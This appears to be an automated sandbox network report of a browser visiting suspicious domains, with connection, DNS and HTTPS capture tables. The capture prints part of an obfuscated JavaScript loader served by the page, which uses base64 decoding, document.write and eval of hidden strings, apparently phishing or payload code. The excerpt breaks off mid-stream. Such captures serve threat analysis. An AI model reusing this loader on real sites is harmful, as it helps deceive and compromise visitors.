                                                                Mar 19, 2025 17:55:50.759922981 CET49708443192.168.2.16104.16.2.189
                                                                Mar 19, 2025 17:55:50.760687113 CET49708443192.168.2.16104.16.2.189
                                                                Mar 19, 2025 17:55:50.760708094 CET44349708104.16.2.189192.168.2.16
                                                                Mar 19, 2025 17:55:51.488292933 CET44349710142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:55:51.488374949 CET49710443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:55:51.489809036 CET49710443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:55:51.489825010 CET44349710142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:55:51.490129948 CET44349710142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:55:51.537729025 CET49710443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:55:57.121100903 CET49671443192.168.2.16204.79.197.203
                                                                Mar 19, 2025 17:55:57.423723936 CET49671443192.168.2.16204.79.197.203
                                                                Mar 19, 2025 17:55:58.030729055 CET49671443192.168.2.16204.79.197.203
                                                                Mar 19, 2025 17:55:59.230737925 CET49671443192.168.2.16204.79.197.203
                                                                Mar 19, 2025 17:56:01.484765053 CET44349710142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:56:01.484827042 CET44349710142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:56:01.484982014 CET49710443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:56:01.636826038 CET49671443192.168.2.16204.79.197.203
                                                                Mar 19, 2025 17:56:01.847259045 CET49710443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:56:01.847297907 CET44349710142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:56:05.560105085 CET49679443192.168.2.1652.182.143.211
                                                                Mar 19, 2025 17:56:05.862720013 CET49679443192.168.2.1652.182.143.211
                                                                Mar 19, 2025 17:56:06.450721979 CET49671443192.168.2.16204.79.197.203
                                                                Mar 19, 2025 17:56:06.466743946 CET49679443192.168.2.1652.182.143.211
                                                                Mar 19, 2025 17:56:07.392333031 CET49721443192.168.2.16188.114.97.3
                                                                Mar 19, 2025 17:56:07.392375946 CET44349721188.114.97.3192.168.2.16
                                                                Mar 19, 2025 17:56:07.392658949 CET49721443192.168.2.16188.114.97.3
                                                                Mar 19, 2025 17:56:07.392658949 CET49721443192.168.2.16188.114.97.3
                                                                Mar 19, 2025 17:56:07.392690897 CET44349721188.114.97.3192.168.2.16
                                                                Mar 19, 2025 17:56:07.677742004 CET49679443192.168.2.1652.182.143.211
                                                                Mar 19, 2025 17:56:08.207845926 CET44349721188.114.97.3192.168.2.16
                                                                Mar 19, 2025 17:56:08.208113909 CET49721443192.168.2.16188.114.97.3
                                                                Mar 19, 2025 17:56:08.212481976 CET49721443192.168.2.16188.114.97.3
                                                                Mar 19, 2025 17:56:08.212501049 CET44349721188.114.97.3192.168.2.16
                                                                Mar 19, 2025 17:56:08.212717056 CET44349721188.114.97.3192.168.2.16
                                                                Mar 19, 2025 17:56:08.212979078 CET49721443192.168.2.16188.114.97.3
                                                                Mar 19, 2025 17:56:08.260329962 CET44349721188.114.97.3192.168.2.16
                                                                Mar 19, 2025 17:56:09.071762085 CET44349721188.114.97.3192.168.2.16
                                                                Mar 19, 2025 17:56:09.071854115 CET44349721188.114.97.3192.168.2.16
                                                                Mar 19, 2025 17:56:09.071927071 CET49721443192.168.2.16188.114.97.3
                                                                Mar 19, 2025 17:56:09.072323084 CET49721443192.168.2.16188.114.97.3
                                                                Mar 19, 2025 17:56:09.072340965 CET44349721188.114.97.3192.168.2.16
                                                                Mar 19, 2025 17:56:10.087754965 CET49679443192.168.2.1652.182.143.211
                                                                Mar 19, 2025 17:56:14.888839006 CET49679443192.168.2.1652.182.143.211
                                                                Mar 19, 2025 17:56:16.062767029 CET49671443192.168.2.16204.79.197.203
                                                                Mar 19, 2025 17:56:24.490748882 CET49679443192.168.2.1652.182.143.211
                                                                Mar 19, 2025 17:56:48.716877937 CET49727443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:48.716943026 CET4434972735.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:48.717036009 CET49727443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:48.717186928 CET49727443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:48.717207909 CET4434972735.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:49.485116005 CET4434972735.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:49.485507011 CET49727443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:49.485541105 CET4434972735.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:49.485704899 CET49727443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:49.485712051 CET4434972735.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:49.692713976 CET4434972735.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:49.693114042 CET49727443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:49.693182945 CET4434972735.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:49.693252087 CET49727443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:49.693900108 CET49728443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:49.693943977 CET4434972835.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:49.694030046 CET49728443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:49.694483995 CET49728443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:49.694494963 CET4434972835.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:50.461220980 CET4434972835.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:50.461319923 CET49728443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:50.461752892 CET49728443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:50.461760998 CET4434972835.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:50.461996078 CET4434972835.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:50.462255001 CET49728443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:50.470793962 CET49731443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:56:50.470829010 CET44349731142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:56:50.470936060 CET49731443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:56:50.471066952 CET49731443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:56:50.471077919 CET44349731142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:56:50.508327007 CET4434972835.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:50.667998075 CET4434972835.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:50.668067932 CET4434972835.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:50.668180943 CET49728443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:50.668400049 CET49728443192.168.2.1635.190.80.1
                                                                Mar 19, 2025 17:56:50.668410063 CET4434972835.190.80.1192.168.2.16
                                                                Mar 19, 2025 17:56:51.555181980 CET44349731142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:56:51.555594921 CET49731443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:56:51.555623055 CET44349731142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:56:52.735143900 CET49732443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:56:52.735194921 CET44349732188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:56:52.735528946 CET49732443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:56:52.735528946 CET49732443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:56:52.735562086 CET44349732188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:56:53.620747089 CET44349732188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:56:53.621798992 CET49732443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:56:53.621824026 CET44349732188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:57:01.547774076 CET44349731142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:57:01.547914028 CET44349731142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:57:01.547979116 CET49731443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:57:01.845261097 CET49731443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:57:01.845283031 CET44349731142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:57:08.434791088 CET44349732188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:57:08.434859991 CET44349732188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:57:08.435075998 CET49732443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:57:09.842272997 CET49732443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:57:09.842302084 CET44349732188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:57:50.530915976 CET49735443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:57:50.531013012 CET44349735142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:57:50.531132936 CET49735443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:57:50.531349897 CET49735443192.168.2.16142.250.186.68
                                                                Mar 19, 2025 17:57:50.531388998 CET44349735142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:57:51.621078014 CET44349735142.250.186.68192.168.2.16
                                                                Mar 19, 2025 17:57:51.663959980 CET49735443192.168.2.16142.250.186.68
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Mar 19, 2025 17:55:45.590626001 CET53497741.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:45.679203987 CET5590553192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:45.679553986 CET5826153192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:45.693079948 CET53559051.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:45.693881035 CET53582611.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:45.758949041 CET53543011.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:47.550810099 CET4959753192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:47.551278114 CET5435053192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:47.552200079 CET6183353192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:47.552442074 CET5937753192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:47.553222895 CET5961253192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:47.553381920 CET6022453192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:47.557655096 CET53495971.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:47.557954073 CET53543501.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:47.558648109 CET53618331.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:47.559915066 CET53596121.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:47.560024977 CET53593771.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:47.560482025 CET53602241.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:48.715037107 CET6105953192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:48.715393066 CET5211453192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:48.722342014 CET53521141.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:48.722356081 CET53610591.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:49.744326115 CET5615953192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:49.744791985 CET6321353192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:49.752844095 CET53561591.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:49.754230976 CET53632131.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:50.407144070 CET6538153192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:50.407334089 CET5673653192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:50.414067984 CET53653811.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:50.415273905 CET53567361.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:56.797389030 CET53608301.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:56:07.314488888 CET5263353192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:56:07.314758062 CET6305053192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:56:07.366993904 CET53526331.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:56:07.461649895 CET53630501.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:56:13.848467112 CET53617311.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:56:32.888751030 CET53574631.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:56:45.598201990 CET53638121.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:56:47.211864948 CET53579101.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:56:49.781428099 CET53501111.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:56:55.229008913 CET53563781.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:57:03.176593065 CET138138192.168.2.16192.168.2.255
                                                                Mar 19, 2025 17:57:25.784127951 CET53562531.1.1.1192.168.2.16
                                                                TimestampSource IPDest IPChecksumCodeType
                                                                Mar 19, 2025 17:56:07.461731911 CET192.168.2.161.1.1.1c286(Port unreachable)Destination Unreachable

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Mar 19, 2025 17:55:45.679203987 CET192.168.2.161.1.1.10x6b62Standard query (0)abdxo.qdhfwaes.esA (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:45.679553986 CET192.168.2.161.1.1.10x1d62Standard query (0)abdxo.qdhfwaes.es65IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.550810099 CET192.168.2.161.1.1.10x70bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.551278114 CET192.168.2.161.1.1.10xe1dcStandard query (0)code.jquery.com65IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.552200079 CET192.168.2.161.1.1.10x8199Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.552442074 CET192.168.2.161.1.1.10x38d5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.553222895 CET192.168.2.161.1.1.10x39b6Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.553381920 CET192.168.2.161.1.1.10xa3e1Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Mar 19, 2025 17:55:48.715037107 CET192.168.2.161.1.1.10x188aStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:48.715393066 CET192.168.2.161.1.1.10x7380Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                Mar 19, 2025 17:55:49.744326115 CET192.168.2.161.1.1.10x7679Standard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:49.744791985 CET192.168.2.161.1.1.10x77d6Standard query (0)developers.cloudflare.com65IN (0x0001)false
                                                                Mar 19, 2025 17:55:50.407144070 CET192.168.2.161.1.1.10x12e9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:50.407334089 CET192.168.2.161.1.1.10x4682Standard query (0)www.google.com65IN (0x0001)false
                                                                Mar 19, 2025 17:56:07.314488888 CET192.168.2.161.1.1.10x4e05Standard query (0)mmeb6h.ptkeol.ruA (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:56:07.314758062 CET192.168.2.161.1.1.10xf539Standard query (0)mmeb6h.ptkeol.ru65IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Mar 19, 2025 17:55:45.693079948 CET1.1.1.1192.168.2.160x6b62No error (0)abdxo.qdhfwaes.es188.114.96.3A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:45.693079948 CET1.1.1.1192.168.2.160x6b62No error (0)abdxo.qdhfwaes.es188.114.97.3A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:45.693881035 CET1.1.1.1192.168.2.160x1d62No error (0)abdxo.qdhfwaes.es65IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.557655096 CET1.1.1.1192.168.2.160x70bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.557655096 CET1.1.1.1192.168.2.160x70bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.557655096 CET1.1.1.1192.168.2.160x70bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.557655096 CET1.1.1.1192.168.2.160x70bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.558648109 CET1.1.1.1192.168.2.160x8199No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.558648109 CET1.1.1.1192.168.2.160x8199No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.559915066 CET1.1.1.1192.168.2.160x39b6No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.559915066 CET1.1.1.1192.168.2.160x39b6No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.560024977 CET1.1.1.1192.168.2.160x38d5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Mar 19, 2025 17:55:47.560482025 CET1.1.1.1192.168.2.160xa3e1No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Mar 19, 2025 17:55:48.722356081 CET1.1.1.1192.168.2.160x188aNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:49.752844095 CET1.1.1.1192.168.2.160x7679No error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:49.752844095 CET1.1.1.1192.168.2.160x7679No error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:49.752844095 CET1.1.1.1192.168.2.160x7679No error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:49.752844095 CET1.1.1.1192.168.2.160x7679No error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:49.752844095 CET1.1.1.1192.168.2.160x7679No error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:49.754230976 CET1.1.1.1192.168.2.160x77d6No error (0)developers.cloudflare.com65IN (0x0001)false
                                                                Mar 19, 2025 17:55:50.414067984 CET1.1.1.1192.168.2.160x12e9No error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:55:50.415273905 CET1.1.1.1192.168.2.160x4682No error (0)www.google.com65IN (0x0001)false
                                                                Mar 19, 2025 17:56:07.366993904 CET1.1.1.1192.168.2.160x4e05No error (0)mmeb6h.ptkeol.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:56:07.366993904 CET1.1.1.1192.168.2.160x4e05No error (0)mmeb6h.ptkeol.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                Mar 19, 2025 17:56:07.461649895 CET1.1.1.1192.168.2.160xf539No error (0)mmeb6h.ptkeol.ru65IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • abdxo.qdhfwaes.es
                                                                  • code.jquery.com
                                                                  • challenges.cloudflare.com
                                                                  • cdnjs.cloudflare.com
                                                                  • developers.cloudflare.com
                                                                  • mmeb6h.ptkeol.ru
                                                                • a.nel.cloudflare.com

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.1649692188.114.96.34436444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-19 16:55:46 UTC660OUTGET /JYVwg6/ HTTP/1.1
                                                                Host: abdxo.qdhfwaes.es
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-03-19 16:55:47 UTC1224INHTTP/1.1 200 OK
                                                                Date: Wed, 19 Mar 2025 16:55:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Server: cloudflare
                                                                Cache-Control: no-cache, private
                                                                Cf-Cache-Status: DYNAMIC
                                                                Vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLt7U6%2F2fT3HnYjcCrVGggpr2I56jj5NZbrtui5vG8CJ%2Bq98RVDU7eMSTWrh5vHSMmQfXEeG2yasEQn50SKQtN13L6npRYsETiqi4raqRqnhNqgenbXu4YJoCv3S"}],"group":"cf-nel","max_age":604800}
                                                                Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server-Timing: cfL4;desc="?proto=TCP&rtt=33215&min_rtt=33072&rtt_var=9381&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1561&delivery_rate=121700&cwnd=213&unsent_bytes=0&cid=9d5a7dab9cb70c5b&ts=301&x=0"
                                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6ImRsaFV3VDkyRG5jWi9VUHA4cXAzQVE9PSIsInZhbHVlIjoiNUU5T0J4cktyb3Rvd3gwbjhOMW1UUmg4aW5oa0JQcXRReHZsd0dwVXlXYnRHWGNsMkh1S2ZTMVFpV2prSU1ZeldKZllRaWtSN1lycmJVVk12QlhrUGNNak5DM2lzN2diVVF4L3ZtWllIVHptcGNjbjkzdXlZSnArd3ZOekd4NDYiLCJtYWMiOiJhM2QxY2NlOTg5YzRmOWJlMjY5ZjA2ODZjZTMzZjdmYTQyMjhjMTlhNzhmZjZjNzAxYjNjYmRiZWY2N2MzZDc3IiwidGFnIjoiIn0%3D; SameSite=None; Secure; Path=/; Max-Age=7200; Expires=Wed, 19 Mar 2025 18:55:46 GMT
                                                                2025-03-19 16:55:47 UTC528INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 6b 33 52 6b 4e 73 64 44 5a 4c 51 6d 49 32 4d 79 39 4a 64 7a 6b 30 51 57 31 34 61 56 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 5a 6a 4a 51 53 58 56 45 51 58 68 4c 63 57 63 72 63 46 64 4a 52 32 59 79 53 54 45 7a 52 44 68 44 63 6a 68 33 61 6b 52 51 51 32 68 36 54 6b 46 43 51 57 6c 58 51 57 74 45 59 6d 6c 4a 62 6a 59 34 4d 57 52 76 55 46 6c 68 55 58 68 56 52 33 64 6a 4f 55 68 77 63 33 5a 52 59 7a 67 7a 65 46 6b 79 63 30 4a 50 51 58 59 33 55 6c 59 34 59 32 56 52 52 6c 5a 54 62 31 46 57 5a 46 52 6d 52 48 45 78 63 54 56 34 59 58 52 6b 52 56 4a 4c 62 55 64 30 56 48 42 47 56 31 46 69 64 56 42 34 4d 6c 64 48 4b 31 46 71 59 54 5a 35 57 6e 4d
                                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ilk3RkNsdDZLQmI2My9Jdzk0QW14aVE9PSIsInZhbHVlIjoiZjJQSXVEQXhLcWcrcFdJR2YySTEzRDhDcjh3akRQQ2h6TkFCQWlXQWtEYmlJbjY4MWRvUFlhUXhVR3djOUhwc3ZRYzgzeFkyc0JPQXY3UlY4Y2VRRlZTb1FWZFRmRHExcTV4YXRkRVJLbUd0VHBGV1FidVB4MldHK1FqYTZ5WnM
                                                                2025-03-19 16:55:47 UTC986INData Raw: 31 63 62 35 0d 0a 3c 73 63 72 69 70 74 3e 0a 77 4b 6f 73 68 5a 6e 6f 5a 78 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 43 61 55 38 75 63 57 52 6f 5a 6e 64 68 5a 58 4d 75 5a 58 4d 76 53 6c 6c 57 64 32 63 32 4c 77 3d 3d 22 29 3b 0a 7a 5a 7a 56 61 77 55 74 5a 44 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 54 78 76 62 44 6e 76 6e 53 43 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 77 4b 6f 73 68 5a 6e 6f 5a 78 20 3d 3d 20 7a 5a 7a 56 61 77 55 74 5a 44 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 54 78 76 62 44 6e 76 6e 53 43 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f
                                                                Data Ascii: 1cb5<script>wKoshZnoZx = atob("aHR0cHM6Ly9CaU8ucWRoZndhZXMuZXMvSllWd2c2Lw==");zZzVawUtZD = atob("bm9tYXRjaA==");TxvbDnvnSC = atob("d3JpdGU=");if(wKoshZnoZx == zZzVawUtZD){document[TxvbDnvnSC](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+Cjxo
                                                                2025-03-19 16:55:47 UTC1369INData Raw: 34 66 53 39 6e 4c 43 42 45 63 48 6c 70 59 57 70 4f 63 31 46 61 49 44 30 2b 43 69 41 67 49 43 41 67 49 46 4e 30 63 6d 6c 75 5a 79 35 6d 63 6d 39 74 51 32 68 68 63 6b 4e 76 5a 47 55 6f 63 47 46 79 63 32 56 4a 62 6e 51 6f 52 48 42 35 61 57 46 71 54 6e 4e 52 57 69 77 67 4d 69 6b 70 43 69 41 67 49 43 41 70 4f 77 6f 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 47 56 32 59 57 77 6f 59 6e 42 31 64 45 4e 75 64 57 74 58 65 53 6b 37 43 69 41 67 66 51 70 39 4f 77 70 6a 62 32 35 7a 64 43 42 4b 64 45 4e 56 5a 47 5a 54 59 6d 64 55 49 44 30 67 62 6d 56 33 49 46 42 79 62 33 68 35 4b 48 74 39 4c 43 42 6a 56 45 56 54 54 30 31 30 65 47 39 46 4b 54 73 4b 53 6e 52 44 56 57 52 6d 55 32 4a 6e 56 46 73 69 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37
                                                                Data Ascii: 4fS9nLCBEcHlpYWpOc1FaID0+CiAgICAgIFN0cmluZy5mcm9tQ2hhckNvZGUocGFyc2VJbnQoRHB5aWFqTnNRWiwgMikpCiAgICApOwogICAgcmV0dXJuIGV2YWwoYnB1dENudWtXeSk7CiAgfQp9Owpjb25zdCBKdENVZGZTYmdUID0gbmV3IFByb3h5KHt9LCBjVEVTT010eG9FKTsKSnRDVWRmU2JnVFsi776g44Wk44Wk776g44Wk776g77
                                                                2025-03-19 16:55:47 UTC1369INData Raw: 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57
